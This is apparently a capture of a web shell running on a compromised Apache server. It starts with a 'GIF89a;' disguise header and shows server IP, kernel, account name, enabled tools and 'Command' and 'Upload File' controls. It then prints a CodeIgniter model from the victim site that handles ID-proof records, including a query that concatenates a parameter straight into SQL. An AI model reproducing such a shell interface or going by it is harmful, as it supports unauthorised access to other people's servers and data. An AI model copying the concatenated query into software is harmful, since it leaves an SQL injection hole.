GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.16.137.229 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../admission/application/models/user/../admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Description of IDProofManagement * * @author Softpro India Pvt. Ltd */ class IDProofManagement extends CI_Model { function getIDProofAndSubIdProofInfoBy($idProofCode, $idProofFor) { $this->db->select("*"); $this->db->from('tbl_id_proof_master TIPM'); $this->db->join('tbl_id_proof_sub_master TIPSM', 'TIPSM.tipm_id = TIPM.tipm_id'); $this->db->where("TIPM.tipm_code", $idProofCode); $this->db->where("TIPSM.tipsm_for = '" . $idProofFor . "'"); return $this->db->get(); } function createNewIDProofInfoMulti(array $newIdProofInfoBatch) { $this->db->insert_batch('tbl_id_proof_info', $newIdProofInfoBatch); return $this->db->insert_id(); } function getIdProofInfoBy($tipi_for, $sub_id_proof_id) { $this->db->select("*"); $this->db->from('tbl_id_proof_info TIPI'); $this->db->where("TIPI.tipsm_id", $sub_id_proof_id); $this->db->where("TIPI.tipi_for", $tipi_for); return $this->db->get(); } }